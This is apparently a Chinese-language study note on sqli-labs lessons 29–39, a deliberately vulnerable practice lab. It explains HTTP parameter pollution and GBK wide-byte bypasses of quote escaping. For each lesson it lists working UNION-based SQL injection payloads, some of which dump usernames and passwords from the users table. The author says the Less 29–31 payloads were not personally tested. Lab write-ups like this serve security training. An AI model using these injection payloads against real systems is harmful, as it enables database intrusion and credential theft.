【20171102早】sqli-libs Less 29-39

  Less 29-31 需要安装tomcat，老黑没实验成功，原理是index.php?id=1&id=2，实际传入系统的是id=2，id=1可以满足过滤，id=2实际为注入的sql语句。可以将payload附上，供大家参考

　　Less29: id=1&id=-2' union select 1,2,(select group_concat(id,0x7c,username,0x7c,password) from security.users)--+

　　Less30: id=1&id=-2”union select 1,2,(select group_concat(id,0x7c,username,0x7c,password) from security.users)--+

　　Less31: id=1&id=-2)union select 1,2,(select group_concat(id,0x7c,username,0x7c,password) from security.users)--+

 

  Less 32-38是同一类题目，代码对 ' 进行了转换，变成 \'，解决办法是使用宽字符将新添的\变成一个宽字符，宽字符的含义是mysql在使用GBK编码时，会认为两个字符(ab)为一个汉字，当然这个a的ASCII码大于128，这里演变过程如下：

　　' -> % \'  <=> %27 -> %5c%27，我们构造的payload时在%5c前加一个%df就会将%df%5c构成一个宽字符，弱化了 \ 的作用，从而使注入可以成功。

　　

  Less32: 192.168.162.135/sqli-libs/Less-32/?id=-1%df%27union select 1,@@version,3--+
  Less33: 192.168.162.135/sqli-libs/Less-33/?id=-1%df%27union select 1,@@version,3--+
  Less34: uname=admin%df%27union select 1,database()#&passwd=1&submit=Submit
  Less35: 192.168.162.135/sqli-libs/Less-35/?id=-1 union select 1,@@version,3--+
  Less36: 192.168.162.135/sqli-libs/Less-36/?id=-1%df%27union select 1,@@version,3--+
  Less37: uname=admin%df%27union select 1,database()#&passwd=1&submit=Submit
  Less38: 192.168.162.135/sqli-libs/Less-38/?id=-1%df%27union select 1,@@version,3--+
  Less39: 192.168.162.135/sqli-libs/Less-39/?id=-1 union select 1,@@version,3--+